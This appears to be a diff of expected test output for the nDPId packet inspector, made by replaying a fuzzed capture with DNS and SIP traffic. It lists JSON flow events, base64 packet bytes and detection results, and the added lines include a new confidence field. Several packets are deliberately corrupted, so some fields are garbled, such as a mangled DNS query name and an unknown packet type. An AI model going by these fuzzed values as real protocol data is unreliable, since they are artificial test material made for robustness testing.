+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469555830,"flow_last_seen":1120469564839,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469564839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572841,"flow_last_seen":1120469572841,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469572841,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1120469572841,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120469572841,"pkt":"ADBUADRWAODtAW69CABFAABEaZcAAIARTb7AqAECwKgBAQqaADUAMHlSV9IAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572841,"flow_last_seen":1120469572841,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469572841,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572841,"flow_last_seen":1120469572841,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469572841,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1120469572842,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120469572842,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CpoAR1vOq9KAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3RP"}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469572842,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469572842,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1120469572844,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"ts_msec":1120469572844,"pkt":"ADBUADRWAODtAW69CABFAAHvaZgAAIARF6bAqAE01PIhIxPEE8QB2272UkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmkdOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEubDticmFuY2g9ejloRzRiS25wMTUxMjQ4NzM3LTQ2WmE3MTVlMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTkwM2RmMGENClRvOiA8c2lwOnZvaTE4MCVzAHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiA1NzgyMjI3MjktbTY2NWQ3NzWjNTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9OWM3ZDJkYmQ4ODIyMDEzYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572981,"flow_last_seen":1120469572981,"flow_idle_time":180000,"flow_min_l4_payload_len":486,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1120469572981,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01090{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1120469572981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"ts_msec":1120469572981,"pkt":"AODtAW69ADBUADRWCABFAAICAABAADcRiivU8iEjwKgBAhPEE8QB7tD8U0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWhsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA2OCBSRUdJU1RFUg0KRnJvbTogPHNpcDp2b2kxODA2M0BzaXAuY3lRZXJjaXR5LmRrPjt0YWc9OTAzZGYwYQ0KVG86IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kay47dGFnPTAwLTA0MDkyLTE3MDFhZjYyLTEyMGM2NzE3Mg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4SjEuMjtyZWNlaXZlZD04MGcyMzAuMm05LjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5d0c0YktucDE1MTI0ODczNy00NmVhNzE1ZTE5Mi4xNjguMS4yDQpXV1ctQXV0aGVmdGljYXRlOiBE+2dlc3QgcmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLG5vbmNlLSIxNzCxYWY1NjZiZTE4MjA3MDA4tGM2Zhc0MDcwNmJiIixvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsc3RhbGU9ZmFscyVzAGxnb3JpdGhtPU1ENQ0KQ29udGVudC1MZW5ndGg6IDANCg0K"}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572981,"flow_last_seen":1120469572981,"flow_idle_time":180000,"flow_min_l4_payload_len":486,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1120469572981,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572981,"flow_last_seen":1120469572981,"flow_idle_time":180000,"flow_min_l4_payload_len":486,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1120469572981,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1120469573246,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469573246,"pkt":"ADBUAGNWAODtAW69CABFAABIaZkAAIIRTbjAqAECwKgBAQqbADVANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAgAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":32,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":32,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1120469574242,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469574242,"pkt":"ADBUADRWAODtAW69CABFAABIaZoAAIARTbfAqAECwKgBAQqbADUANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469573246,"flow_last_seen":1120469574242,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469574242,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469573246,"flow_last_seen":1120469574242,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469574242,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":23,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120469576245,"pkt":"ADCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":23,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1120469578248,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469578248,"pkt":"ADBUADRWAODtAW69CABFAABIaZwAAIARTbXAqAECwKgBAQqbADUANPFWONMBAAABAAAAAABJBF9zaXAEX3VkcANzaXAJY3liZXLyaXR5AmRrAAAhAAE="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469578248,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyber?ity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469578248,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyber?ity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00405{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":25,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120469582254,"pkt":"ADBUADRWAODtAW69CABFAAB2aZ0AAIARTbTAqAECwKgBAQqbADUANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5TWRrAAAhAAE="}
 00198{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":25,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1120469589080,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120469589080,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaZ4AAIARTK\/AqAECwKgB\/wCJAIkAOluxhOoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1120469590256,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120469590256,"pkt":"ADBUADRWAODtAW69CABFAABEaaAAAIARTbXAqAECwKgBAQqcADUAMHpPqtMAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1120469590257,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1120469590257,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":65,"ts_msec":1120469590257,"pkt":"AODtAW69ADBUADRWCABFAABVAABAAEARtz7AqAEBwKgBAiVzAJwAx1zLqtOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
 01256{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":30,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":722,"pkt_type":10240,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":722,"pkt_l4_len":0,"ts_msec":1120469590259,"pkt":"ADBUADRWAODtAW69KABFAALEaaEAAIARFsjAqAEC1PIhIxPEE8QCsIioUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhVyBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFsY2g9ejloRzRiS25wMTQ5NTA1MTc4LTQzOGM1MjhiMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPThlOTQ4YjANClRvOiA8c2lwOnZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4PjEuMjo1MDYwO2xpbmU8OWM3ZDJkYmQ4ODIyMDHhYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDY5IFJFR0lTVEVSDQpDb250ZW50LUxlbmd0aDogMA0KQXV0aG9yaXphdGlvbjogRGlnZXMlcwBzZXJuYW1lPSJ2b2mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq